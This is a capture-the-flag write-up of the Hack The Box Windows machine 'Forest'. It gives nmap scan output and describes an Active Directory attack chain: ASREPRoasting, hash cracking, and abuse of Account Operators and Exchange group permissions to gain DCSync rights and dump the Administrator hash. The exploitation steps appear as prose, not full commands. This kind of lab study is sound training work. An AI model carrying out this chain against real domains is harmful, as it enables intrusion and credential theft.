HTB - Forest Writeup

Liam Geyer

👾 Machine Overview

This is a writeup of the machine Forest from HTB , it’s an easy difficulty Windows machine which featured anonymous LDAP access, ASREPRoasting, and AD permission misconfigurations.

🔍 Enumeration

An initial nmap scan of the host gave the following results:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
nmap -sV -sC 10.129.95.210 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 15:44 EDT
Nmap scan report for 10.129.95.210
Host is up (0.019s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-29 19:51:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-05-29T19:51:20
|_ start_date: 2024-05-29T19:47:08
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2024-05-29T12:51:24-07:00
|_clock-skew: mean: 2h26m50s, deviation: 4h02m32s, median: 6m48s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.15 seconds

I tested for anonymous LDAP access using nmap

1
2
nmap -n -sV --script "ldap* and not brute" 10.129.95.210
# Output omitted for brevity

🥈 User

We did get output, so I used Impacket’s get-NPUsers to see if there were any ASREPRoastable users.

ASREPRoasting

We were able to get output for svc-alfresco, so I threw it into hashcat.

Cracking svc-alfresco

The password cracked, I was able to use it to WinRM in and grab the flag.

🥇 Root

I started off by checking out svc-alfresco‘s groups and privileges.

Groups and privs

Looks like we were able to get a pretty privileged user, we’re a member of both the Privileged IT Accounts, and Account Operators groups.

I ran SharpHound to see what targets the account could reach.

BloodHound

This path didn’t make a ton of sense to me. If the Administrator was logged into Forest, it’s possible we could dump his credentials, but this doesn’t work because svc-alfresco isn’t a local admin. I decided to keep digging through bloodhound to find any interesting permissions we might have.

BloodHound

The Account Operators group has GenericAll over the Exchange Windows Permissions group, which in turn has WriteDacl over the entire domain.

As a result of this, we’re able to first add a new user to the Exchange Windows Permissions group, and then give them permission to DCSync.

Creating a new user

Once that’s done, we’re able to use Impacket’s secretsdump to dump the Administrator’s hash.

DCSync

I then used that hash to WinRM in and grab the flag.

Shell as Administrator

I tried to exploit this a couple different ways, including adding the svc-alfresco user to the group. It specifically only seemed to work when using PowerView to create a new user and target them for the attack.

📖 Resources

🔗 Hyperlink ℹ️ Info
ASREPRoasting Cybersec Notes
Account Operators PrivEsc White Oak Security
  • Title: HTB - Forest Writeup
  • Author: Liam Geyer
  • Created at : 2024-07-26 00:00:00
  • Updated at : 2024-10-10 09:01:47
  • Link: https://lfgberg.org/2024/07/26/htb/forest/
  • License: This work is licensed under CC BY-NC-SA 4.0.